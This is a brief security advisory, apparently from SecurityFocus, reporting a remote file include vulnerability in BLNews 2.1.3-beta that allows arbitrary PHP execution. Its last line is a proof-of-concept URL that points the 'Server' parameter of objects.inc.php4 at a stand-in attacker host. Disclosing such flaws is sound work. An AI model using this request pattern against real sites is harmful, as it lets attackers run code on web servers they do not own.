source: http://www.securityfocus.com/bid/7677/info

It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.

This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected. 

http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org